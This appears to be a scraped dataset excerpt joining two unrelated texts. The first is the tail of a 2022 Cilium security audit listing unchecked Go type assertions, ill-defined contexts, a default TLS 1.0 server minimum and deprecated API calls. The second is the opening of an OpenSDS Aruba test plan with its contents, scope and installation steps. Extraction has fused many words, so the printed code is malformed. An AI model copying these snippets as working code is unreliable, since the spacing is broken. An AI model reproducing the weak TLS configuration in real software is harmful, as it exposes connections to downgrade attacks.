:=rawObj.(*gatewayv1beta1.HTTPRoute)if!ok {\nhttps://github.com/cilium/cilium/blob/d0a43aa05ee39b884ff9e87318e2a6aebd5ca98f/operator/pkg/gateway-api/httpro\nute.go#L70-L72\nfunc(rawObj client.Object) []string{hr :=rawObj.(*gatewayv1beta1.HTTPRoute)vargateways []string\nhttps://github.com/cilium/cilium/blob/8df3d1e320da86b75f07f65adcd185299a5b6d9c/operator/pkg/lbipam/lbipam.go#\nL398-L401\nfori :=0; i < poolRetryQueue.Len(); i++ {retryInt, _ := poolRetryQueue.Get()retry :=retryInt.(*retry)\nhttps://github.com/cilium/cilium/blob/6c98f152ad9e9d9882bc02840474dd39c04bd1e0/operator/watchers/cilium_endp\noint.go#L200-L204\nif!exists {returnnil,false,nil}cep :=item.(*cilium_api_v2.CiliumEndpoint)returncep, exists,nil\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL71\n60Cilium security audit, 2022\nsuccess := checkAndMarkNode(c, nodeGetter,key.(string), mno)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL161\npodInterface, exists, err := ciliumPodsStore.GetByKey(key.(string))\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL170\npod :=podInterface.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL198\nciliumPod :=ciliumPodInterface.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/pod.go#L43\npod :=obj.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/datapath/ipcache/listener.go\n#L192\nk :=key.(*ipcacheMap.Key)\nhttps://github.com/cilium/cilium/blob/e4d68f84a7c957bc9c6b6fea3bfda3151f830629/pkg/datapath/loader/hash.go#L77\nstate, err := d.Hash.(encoding.BinaryMarshaler).MarshalBinary()\nhttps://github.com/cilium/cilium/blob/e4d68f84a7c957bc9c6b6fea3bfda3151f830629/pkg/datapath/loader/hash.go#L82\niferr :=newDatapathHash.(encoding.BinaryUnmarshaler).UnmarshalBinary(state);err !=nil{\nhttps://github.com/cilium/cilium/blob/be6d746ae29fc733bc3a58e2afcc79e77c35485b/pkg/endpoint/policy.go#L607\nregenResult :=result.(*EndpointRegenerationResult)\nhttps://github.com/cilium/cilium/blob/79c6f5725372b52c9877a9bde1249da039948649/pkg/envoy/server.go#L1778\nnetworkPolicy :=res.(*cilium.NetworkPolicy)\nhttps://github.com/cilium/cilium/blob/83f82482f9c831de712a14c9adc72caa0bda3dc3/pkg/envoy/xds/server.go#L274\nreq := recv.Interface().(*envoy_service_discovery.DiscoveryRequest)\nhttps://github.com/cilium/cilium/blob/83f82482f9c831de712a14c9adc72caa0bda3dc3/pkg/envoy/xds/server.go#L387\nresp := recv.Interface().(*VersionedResources)\n61Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/e6ce5c17afc21448fa9e69a7a36eb41814532256/pkg/hubble/relay/queue/priority_\nqueue.go#L48\nresp := heap.Pop(&pq.h).(*observerpb.GetFlowsResponse)\nhttps://github.com/cilium/cilium/blob/e6ce5c17afc21448fa9e69a7a36eb41814532256/pkg/hubble/relay/queue/priority_\nqueue.go#L91\nresp :=x.(*observerpb.GetFlowsResponse)\nhttps://github.com/cilium/cilium/blob/69e4c6974891c161300889596f2029e489dded02/pkg/k8s/init.go#L102\ntypesNode :=nodeInterface.(*slim_corev1.Node)\nhttps://github.com/cilium/cilium/blob/09f72f77b460bfcb0eef09c4552026ec2e45fe65/pkg/k8s/resource/resource.go#L25\n4\nentry :=raw.(queueEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L285\nkey :=k.(CtKey)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L289\nvalue :=v.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L361\nentry :=value.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L445\nentry :=value.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L599\n-L600\nnatKey :=key.(nat.NatKey)natVal :=value.(nat.NatEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L37\nnatKey :=k.(*nat.NatKey6)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L60\nnatVal :=v.(*nat.NatEntry4)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L78-L7\n9\nnatKey :=k.(*nat.NatKey6)natVal :=v.(*nat.NatEntry6)\n62Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L118\nnatKey :=k.(*nat.NatKey6)\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/egressmap/policy.go\n#L176-L177\nkey :=k.(*EgressPolicyKey4)value :=v.(*EgressPolicyVal4)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L242\nvHost := v.ToHost().(*RevNat4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L288\nkHost := k.ToHost().(*Service4Key)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L342\nsHost := s.ToHost().(*Service4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L452\nvHost := v.ToHost().(*Backend4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L516\nvHost := v.ToHost().(*Backend4ValueV3)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L109\nvHost := v.ToHost().(*RevNat6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L153\nkHost := k.ToHost().(*Service6Key)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L207\nsHost := s.ToHost().(*Service6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L316\nvHost := v.ToHost().(*Backend6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L83\nsvcVal := svcKey.NewValue().(ServiceValue)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L120\nzeroValue := svcKey.NewValue().(ServiceValue)\n63Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L336\nmatchKey := key.DeepCopyMapKey().(*AffinityMatchKey).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L357\nk :=key.(SourceRangeKey).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L430\n-L438\nparseBackendEntries :=func(key bpf.MapKey, valuebpf.MapValue) {backendKey :=key.(BackendKey)backendValue := value.DeepCopyMapValue().(BackendValue).ToHost()backendValueMap[backendKey.GetID()] = backendValue}\nparseSVCEntries :=func(key bpf.MapKey, value bpf.MapValue){svcKey := key.DeepCopyMapKey().(ServiceKey).ToHost()svcValue := value.DeepCopyMapValue().(ServiceValue).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L514\n-L515\nbackendKey :=key.(BackendKey)backendValue := value.DeepCopyMapValue().(BackendValue).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L564\nzeroValue := fe.NewValue().(ServiceValue)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lbmap/source_range.g\no#L52\nkHost := k.ToHost().(*SourceRangeKey4)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lbmap/source_range.g\no#L96\nkHost := k.ToHost().(*SourceRangeKey6)\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/maps/metricsmap/metricsma\np.go#L90-L91\nkey :=k.(*Key)values :=v.(*Values)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/nat/nat.go#L131-L138\ncb :=func(k bpf.MapKey, v bpf.MapValue) {key :=k.(NatKey)if!key.ToHost().Dump(&sb,false) {return}\n64Cilium security audit, 2022\nval :=v.(NatEntry)sb.WriteString(val.ToHost().Dump(key, nsecStart))}\nhttps://github.com/cilium/cilium/blob/d1d8e7a35b35d3420a33251767ae2696d664da53/pkg/maps/policymap/policyma\np.go#L375-L381\ncb :=func(key bpf.MapKey, value bpf.MapValue) {eDump := PolicyEntryDump{Key: *key.DeepCopyMapKey().(*PolicyKey),PolicyEntry: *value.DeepCopyMapValue().(*PolicyEntry),}entries =append(entries, eDump)}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/maps/recorder/recorder.go#L6\n0-L65\ncb :=func(k bpf.MapKey, v bpf.MapValue) {key :=k.(RecorderKey)key.ToHost().Dump(&sb)val :=v.(RecorderEntry)val.Dump(&sb)}\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/policy.go#L\n158-L167\nfunc(k, vinterface{}) {key4 :=k.(*PolicyKey4)key := PolicyKey{VRFID: key4.VRFID,DestCIDR: key4.getDestCIDR(),}value :=v.(*PolicyValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/policy.go#L\n174-L183\nfunc(k, vinterface{}) {key6 :=k.(*PolicyKey6)key := PolicyKey{VRFID: key6.VRFID,DestCIDR: key6.getDestCIDR(),}value :=v.(*PolicyValue)\ncb(&key, value)})\n65Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/9c07b75282546500e26da55c46b7cf9c110205f0/pkg/maps/srv6map/sid.go#L96-L\n97\nkey :=k.(*SIDKey)value :=v.(*SIDValue)\nhttps://github.com/cilium/cilium/blob/fe9baa95eadc9ab678af619063ba443a4abcafbd/pkg/maps/srv6map/state.go#L92\n-L103\nfunc(k, vinterface{}) {key4 :=k.(*StateKey4)srcIP := key4.InnerSrc.IP()dstIP := key4.InnerDst.IP()key := StateKey{InnerSrc: &srcIP,InnerDst: &dstIP,}value :=v.(*StateValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/fe9baa95eadc9ab678af619063ba443a4abcafbd/pkg/maps/srv6map/state.go#L11\n0-L121\nfunc(k, vinterface{}) {key6 :=k.(*StateKey6)srcIP := key6.InnerSrc.IP()dstIP := key6.InnerDst.IP()key := StateKey{InnerSrc: &srcIP,InnerDst: &dstIP,}value :=v.(*StateValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/vrf.go#L158\n-L168\nfunc(k, vinterface{}) {key4 :=k.(*VRFKey4)srcIP := key4.SourceIP.IP()key := VRFKey{SourceIP: &srcIP,DestCIDR: key4.getDestCIDR(),}value :=v.(*VRFValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/srv6map/vrf.go#L175\n-L185\n66Cilium security audit, 2022\nfunc(k, vinterface{}) {key6 :=k.(*VRFKey6)srcIP := key6.SourceIP.IP()key := VRFKey{SourceIP: &srcIP,DestCIDR: key6.getDestCIDR(),}value :=v.(*VRFValue)\ncb(&key, value)})\nhttps://github.com/cilium/cilium/blob/da9d6a0167e1cede54480dbe832ef0ef5dca3aa8/pkg/nodediscovery/nodediscove\nry.go#L456\ntypesNode :=nodeInterface.(*k8sTypes.Node)\n67Cilium security audit, 2022\n20: Ill-defined contexts\nOverall severity:\nInformational\nID:\nADA-CIL-20\nLocation:\nSeveral packages\nDescription\nAt the time of the audit, Cilium has 149 cases of ill-defined contexts -context.TODO()\n. To\nreproduce:\ngit clone https://github.com/cilium/cilium --depth=1cd ciliumrm -r testrm -r vendorgrep -r “context\\.TODO” --exclude=*_test.go\nThe Golang docs states aboutcontext.TODO()\n:\n“\nTODO returns a non-nil, empty Context. Code should\nuse context.TODO when it's unclear which\nContext to use or it is not yet available (because the surrounding function has not yet been extended\nto accept a Context parameter).\n”\nAs such, ill-defined contexts should be avoided in Ciliums production code.\nRecommendation\nA best effort of using well-defined contexts over time.\n68Cilium security audit, 2022\n21: Use of deprecated TLS version\nOverall severity:\nInformational\nID:\nADA-CIL-21\nLocation:pkg/crypto/certloader\nCWE\n●\nCWE-326: Inadequate Encryption Strength\n●\nCWE-327: Use of a Broken or Risky Cryptographic Algorithm\n●\nCWE-757: Selection of Less-Secure Algorithm During \nNegotiation ('Algorithm Downgrade')\nFix\nhttps://github.com/cilium/cilium/commit/ca890a4938f765be78db19ac77916e \nff1be66a3f\nDescription\nBy default acrypto/tls.Config\nsets the minimum accepted\nTLS version to 1.0 when acting as a\nserver. From the Golang docs oncrypto/tls.Config\n:\n“\n// By default, TLS 1.2 is currently used as the minimum\nwhen acting as a\n// client, and TLS 1.0 when acting as a server. TLS 1.0 is the minimum\n// supported by this package, both as a client and as a server.\n”\nThis is an issue in case a minimum TLS version is not specified in the Config. TLS 1.0 and TLS 1.1 are\nformally deprecated and a number of known attacks are known to exploit weaknesses of the\nprotocols. For example, TLS 1.0 and TLS 1.0 rely on MD5 and SHA-1 which makes the protocols\nvulnerable to downgrade attacks. Authentication of handshakes is done based on SHA-1 which\nincreases the chance for an attacker to carry out a MITM attack by impersonating a server.\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/crypto/c\nertloader/server.go#L102\nfunc(c *WatchedServerConfig)ServerConfig(base *tls.Config)*tls.Config{// We return a tls.Config having only the GetConfigForClientmember set.// When a client initialize a TLS handshake, thisfunction will be called// and the tls.Config returned by GetConfigForClientwill be used. This// mechanism allow us to reload the certificatestransparently between two// clients connections without having to restartthe server.// See also the discussion at https://github.com/golang/go/issues/16066.return&tls.Config{GetConfigForClient:func(_ *tls.ClientHelloInfo)(*tls.Config, error) {keypair, caCertPool := c.KeypairAndCACertPool()tlsConfig := base.Clone()tlsConfig.Certificates = []tls.Certificate{*keypair}ifc.IsMutualTLS() {// We've been configured to serve mTLS, so setuptheClientCAs// accordingly.tlsConfig.ClientCAs = caCertPool\n69Cilium security audit, 2022\n// The caller may have its own desire about the handshake// ClientAuthType. We honor it unless its tls.NoClientCert(the// default zero value) as we are configured toserve mTLS.iftlsConfig.ClientAuth == tls.NoClientCert {tlsConfig.ClientAuth =tls.RequireAndVerifyClientCert}}c.log.WithField(\"keypair-sn\", keypairId(keypair)).Debugf(\"Server tls handshake\")returntlsConfig,nil},}}\nRecommendations\nSpecify the minimum accepted TLS version in thecrypto/tls.Config\n.\nThe Cilium maintainers\ntriaged this issue and found\nthat the existing users of this libr ary code\nensur ed a newer TLS v ersion was used. This included Hubble clients and ser vers. The libr ary\ncode itself did not pr eviously enfor ce a new enough TLS v ersion.\n70Cilium security audit, 2022\n22: Deprecated function calls\nOverall severity:\nLow\nID:\nADA-CIL-22\nLocation:\nSeveral packages\nCWE:\n●\nCWE-477: Use of Obsolete Function\nDescription\nDeprecated 3rd-party APIs may be abandoned to a degree where patches to known security issues\nare not applied. Cilium makes calls to deprecated APIs in several places throughout the codebase.\nWe recommend creating a strategy to replace deprecated APIs over time. It could be shared in a\npublic Github issue to get support from the community.\nAt commit398cf5e051c49a46941d1efedf9659740d80f52c\n,\nthese are the uses of deprecated APIs\nthat need addressing:\nLocation\nDeprecated API call\napi/v1/health/server/server.go:316:3httpsServer.TLSConfig.BuildNameToCertificate\napi/v1/operator/server/server.go:317:3httpsServer.TLSConfig.BuildNameToCertificate\napi/v1/server/server.go:316:3httpsServer.TLSConfig.BuildNameToCertificate\ndaemon/cmd/status.go:256:29strings.Title\ndaemon/cmd/status.go:266:37strings.Title\noperator/metrics/metrics.go:139:24prometheus.NewProcessCollector\npkg/aws/ec2/ec2.go:79:25aws.EndpointResolverFunc\npkg/envoy/accesslog_server.go:167:14pblog.Method\npkg/envoy/accesslog_server.go:168:18pblog.Status\npkg/envoy/accesslog_server.go:169:23pblog.Scheme\npkg/envoy/accesslog_server.go:169:37pblog.Host\npkg/envoy/accesslog_server.go:169:49pblog.Path\npkg/envoy/accesslog_server.go:170:26pblog.HttpProtocol\npkg/envoy/accesslog_server.go:171:32pblog.Headers\n71Cilium security audit, 2022\npkg/envoy/sort.go:221:8m1.GetExactMatch\npkg/envoy/sort.go:222:8m2.GetExactMatch\npkg/envoy/sort.go:230:10m1.GetSafeRegexMatch\npkg/envoy/sort.go:231:10m2.GetSafeRegexMatch\npkg/envoy/sort.go:275:7m1.GetPrefixMatch\npkg/envoy/sort.go:276:7m2.GetPrefixMatch\npkg/envoy/sort.go:284:7m1.GetSuffixMatch\npkg/envoy/sort.go:285:7m2.GetSuffixMatch\npkg/health/client/client.go:59:3tr.Dial\npkg/health/client/client.go:64:3tr.Dial\npkg/hubble/metrics/drop/handler.go:56:62flow.GetDropReason\npkg/hubble/parser/seven/parser.go:125:2decoded.DropReason\npkg/hubble/parser/seven/parser.go:137:2decoded.Reply\npkg/hubble/parser/seven/parser.go:144:2decoded.Summary\npkg/hubble/parser/sock/parser.go:118:2decoded.Summary\npkg/hubble/parser/threefour/parser.go:193:2decoded.DropReason\npkg/hubble/parser/threefour/parser.go:194:41decoded.DropReason\npkg/hubble/parser/threefour/parser.go:205:2decoded.Reply\npkg/hubble/parser/threefour/parser.go:214:2decoded.Summary\npkg/hubble/peer/types/client.go:56:45grpc.WithInsecure\npkg/hubble/relay/pool/client.go:53:23grpc.WithInsecure\npkg/hubble/relay/pool/option.go:29:4grpc.WithInsecure\npkg/k8s/informer/informer.go:86:10cache.NewDeltaFIFO\npkg/k8s/slim/k8s/apis/labels/selector.go:270:32sets.String\npkg/k8s/slim/k8s/apis/labels/selector.go:271:9sets.String\npkg/k8s/slim/k8s/apis/labels/selector.go:689:13sets.String\npkg/k8s/slim/k8s/apis/labels/selector.go:755:33sets.String\npkg/k8s/slim/k8s/apis/labels/selector.go:781:42sets.String\npkg/k8s/slim/k8s/apis/labels/selector.go:817:37sets.String\nproxylib/npds/client.go:137:35grpc.WithInsecure\n72" } ]
{ "category": "Runtime", "file_name": "OpenSDS_Aruba_POC_Plan.pdf", "project_name": "Soda Foundation", "subcategory": "Cloud Native Storage" }
[ { "data": " \n OpenSDS Aruba POC Test Plan June 2018 Revision: 0.6 Author: OpenSDS OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT ii Document Revision History Version Date Comments 0.1 6/12/2018 Initial revision. 0.2 6/15/2018 Added content to sections host-based replication, array-based replication, CLI guide, Cinder compatible APIs. 0.3 6/20/2018 Modified dates after reviewing it at OSS Summit Tokyo 0.4 6/26/2018 Add Dashboard section; Modify CLI section. 0.5 6/29/2018 Update Dashboard section and Installation section. 0.6 7/05/2018 Update the use cases of dashboard and replication with kubernetes Related Documents Author Documents OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT iii Table of Contents 1 Overview................................................................................................................ 1 1.1 Project Scope and Objectives .................................................................................................. 1 1.2 POC Timeline ........................................................................................................................... 2 2 System requirements............................................................................................ 2 2.1 Hardware .................................................................................................................................. 2 2.2 Software .................................................................................................................................... 2 \n OS ....................................................................................................................................... 2 3 Features .................................................................................................................. 3 4 Installation............................................................................................................. 4 4.1 Prerequisite ............................................................................................................................... 4 \n Packages ............................................................................................................................. 4 \n Golang ................................................................................................................................ 4 \n docker ................................................................................................................................. 4 4.2 Kubernetes Local Cluster Deployment ................................................................................... 5 \n Install Etcd ......................................................................................................................... 5 \n kubernetes local cluster ..................................................................................................... 5 4.3 OpenSDS Deployment ............................................................................................................. 6 \n Pre-config ........................................................................................................................... 6 \n Download opensds-installer code .................................................................................... 6 \n Install ansible tool.............................................................................................................. 6 \n Configure OpenSDS cluster variables .............................................................................. 6 4.3.4.1 System environment ...................................................................................................... 6 4.3.4.2 LVM .............................................................................................................................. 7 4.3.4.3 Ceph .............................................................................................................................. 7 4.3.4.4 Cinder............................................................................................................................ 7 \n Check if the hosts can be reached ..................................................................................... 8 \n Run opensds-ansible playbook to start deploy ............................................................... 8 4.4 Test OpenSDS ........................................................................................................................... 8 \n Use OpenSDS CLI Tool ..................................................................................................... 8 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT iv \n Test CSI Plugin .................................................................................................................. 9 \n OpenSDS Dashboard......................................................................................................... 9 4.5 Cleanup OpenSDS .................................................................................................................... 9 \n Run opensds-ansible playbook to clean the environment .............................................. 9 \n Run ceph-ansible playbook to clean ceph cluster if ceph is deployed ......................... 10 \n Remove ceph-ansible source code (optional) ................................................................ 10 4.6 Troubleshooting ..................................................................................................................... 10 \n Problem Starting CSI Plugin ........................................................................................... 10 5 Use Cases ............................................................................................................. 11 5.1 Dashboard .............................................................................................................................. 11 \n Administrator configuration .......................................................................................... 11 5.1.1.1 Login ........................................................................................................................... 11 5.1.1.2 Create tenant ............................................................................................................... 12 5.1.1.3 Create user ................................................................................................................... 12 5.1.1.4 Create profile................................................................................................................ 13 5.1.1.5 View resources ............................................................................................................. 13 \n Tenant provision volume ................................................................................................ 14 5.1.2.1 Overview ..................................................................................................................... 14 5.1.2.2 Create volume .............................................................................................................. 14 5.1.2.3 Expand volume size...................................................................................................... 15 5.1.2.4 Create volume snapshot ................................................................................................ 15 5.1.2.5 Create volume from snapshot........................................................................................ 16 5.1.2.6 Create volume replication ............................................................................................. 16 5.1.2.7 Disable/Enable/Failover volume replication .................................................................. 17 5.1.2.8 Create volume group .................................................................................................... 17 5.1.2.9 Add volumes into group ............................................................................................... 18 5.1.2.10 Tenant isolation ....................................................................................................... 18 5.2 Kubernetes .............................................................................................................................. 20 5.3 OpenStack .............................................................................................................................. 20 \n Use OpenSDS to Manage Cinder Drivers ...................................................................... 21 5.3.1.1 Prepare ........................................................................................................................ 21 5.3.1.2 Install OpenStack using devstack ................................................................................. 21 5.3.1.3 Install ceph using ansible ............................................................................................. 21 5.3.1.4 Configuration .............................................................................................................. 22 5.3.1.4.1 OpenSDS ............................................................................................................. 22 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT v 5.3.1.4.2 Set ceph as backend of Cinder ........................................................................... 23 5.3.1.5 Testing......................................................................................................................... 24 \n OpenSDS with Cinder Compatible API ......................................................................... 25 5.3.2.1 Installation .................................................................................................................. 25 5.3.2.2 Volume Types .............................................................................................................. 26 5.3.2.2.1 List all volume types (default policy) ................................................................ 26 5.3.2.2.2 Delete a volume type .......................................................................................... 26 5.3.2.2.3 List all volume types(0) ...................................................................................... 26 5.3.2.2.4 Create a volume type .......................................................................................... 27 5.3.2.2.5 Show volume type detail .................................................................................... 27 5.3.2.2.6 Create a volume type(2nd) ............................................................................ 27 5.3.2.2.7 List all volume types (2) ..................................................................................... 27 5.3.2.2.8 Update an encryption type ................................................................................. 28 5.3.2.2.9 Lists current volume types and extra specs. ..................................................... 28 5.3.2.2.10 Create or update extra specs for volume type ................................................ 29 5.3.2.2.11 Delete extra specification for volume type ...................................................... 29 5.3.2.3 Volumes ....................................................................................................................... 29 5.3.2.3.1 List accessible volumes with details (0) ............................................................. 29 5.3.2.3.2 Create a volume (1st) .......................................................................................... 30 5.3.2.3.3 List accessible volumes with details (1) ............................................................. 30 5.3.2.3.4 Show a volume’s details ..................................................................................... 30 5.3.2.3.5 Delete a volume .................................................................................................. 30 5.3.2.4 Snapshots..................................................................................................................... 30 5.3.2.4.1 Create a snapshot ................................................................................................ 31 5.3.2.4.2 List snapshots and details .................................................................................. 31 5.3.2.4.3 Show a snapshot’s details ................................................................................... 31 5.3.2.4.4 Delete a snapshot ................................................................................................ 31 5.3.2.5 Attachments ................................................................................................................ 31 5.3.2.5.1 Create attachment ............................................................................................... 31 5.3.2.5.2 Show attachment................................................................................................. 31 5.3.2.5.3 List attachment .................................................................................................... 32 5.3.2.5.4 Update attachment ............................................................................................. 32 5.3.2.5.5 Delete attachment ............................................................................................... 33 5.4 Array-based Replication using Dorado................................................................................ 34 \n Without Kubernetes ........................................................................................................ 34 5.4.1.1 Configuration .............................................................................................................. 34 5.4.1.2 Testing......................................................................................................................... 38 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT vi \n With Kubernetes .............................................................................................................. 41 5.4.2.1 Configuration .............................................................................................................. 41 5.4.2.2 Testing steps ................................................................................................................ 45 5.5 Host-based Replication using DRBD ................................................................................... 47 \n Prepare ............................................................................................................................. 47 \n Install DRBD .................................................................................................................... 47 \n Configuration .................................................................................................................. 47 \n Create Replication ........................................................................................................... 49 \n Check result ..................................................................................................................... 50 6 OpenSDS CLI Guide ......................................................................................... 51 6.1 List Docks ............................................................................................................................... 51 6.2 List Pools ................................................................................................................................ 52 6.3 Create/Delete Profile.............................................................................................................. 53 6.4 Create/Delete/Get/List Volume(s) ......................................................................................... 53 6.5 Create/Delete/Get/List Snapshot(s) ...................................................................................... 55 6.6 Create Volume from Snapshot............................................................................................... 56 6.7 Expand Volume....................................................................................................................... 57 6.8 Create/Update/Delete/Get/List Volume Groups .................................................................. 58 6.9 Replication ............................................................................................................................. 60 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 1 1 Overview OpenSDS Aruba will be released in the week of June 27, 2018. This document serves as the OpenSDS Aruba POC Test Plan. It covers the following topics: 1. Overall project scope and objectives 2. Test objectives and success criteria 3. Test resources required 4. Test schedule 5. Use cases a. OpenStack/Kubernetes/bare-metal/mixed environment provisioning b. Host and storage replication, and local and remote replication c. Test cases for each use case 1.1 Project Scope and Objectives \nIn the Zealand release, basic volume and snapshot CRUD functionalities were added and Kubernetes CSI/FlexVolume support was also added. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 2 During the Aruba release, the focus has been on storage orchestration, building advanced automated storage and data services across traditional data centers, private and public clouds. Functionalities in this release include basic OpenStack integration, integrating with Keystone for identity service, array-based and host-based replication, and storage profiles design based on Swordfish. A deployment tool using Ansible is also available to install OpenSDS with Keystone and Dashboard. 1.2 POC Timeline June 15: POC plan draft ready for EUAC review June 20: Aruba release. POC plan approval. July 1-31: POC testing August 7: POC results/comments/testimonials 2 System requirements 2.1 Hardware The hardware requirements are described in this section. For array-based replication, two physical servers and two Dorado arrays are needed. For host-based replication, two physical servers are needed. For other tests described in this POC, one physical server or one VM can be used for basic testing. 2.2 Software The software requirements are described in this section. \n OS Ubuntu 16.04.2 has been used during the testing and therefore should be used in this POC: root@proxy:~# cat /etc/issue Ubuntu 16.04.2 LTS \\n \\l OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 3 For host-based replication, required DRBD software is described in the relevant section later. Other required software is described in the installation section. 3 Features Features to be tested include the following: - Multitenancy using Keystone - Create/delete volume - Expand volume - Create/delete snapshot - Create volume from snapshot - Create volume group - Create/delete profile - Array-based replication - Host-based replication - Use Cinder-compatible API in OpenStack Supported storage backends include the following: - LVM - Ceph - Dorado - IBM storage via Cinder driver? - Cinder stand alone with LVM - Cinder in an OpenStack deployment with LVM Supported protocols: - iSCSI OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 4 - FC - RBD Testing environment includes the following: - OpenSDS with Kubernetes - OpenSDS with OpenStack (full OpenStack deployment or Cinder stand-alone) - Hotpot only on bare-metal or a VM 4 Installation In the section, how to install OpenSDS using Ansible playbook will be discussed. Section 4.1 is prerequisites for Installation. If you are testing OpenSDS with Kubernetes, read section 4.2 Kubernetes Local Cluster Deployment first. Otherwise, go to section 4.3 directly. For OpenSDS with OpenStack, testing with Cinder stand-alone is part of the OpenSDS ansible installation in section 4.3, and testing with a separate Cinder deployment is discussed in section 5.3 OpenStack. 4.1 Prerequisite \n Packages Install following packages: apt-get install vim git curl wget make gcc zip \n Golang You can install golang by executing commands blow: wget https://storage.googleapis.com/golang/go1.9.2.linux-amd64.tar.gz tar -C /usr/local -xzf 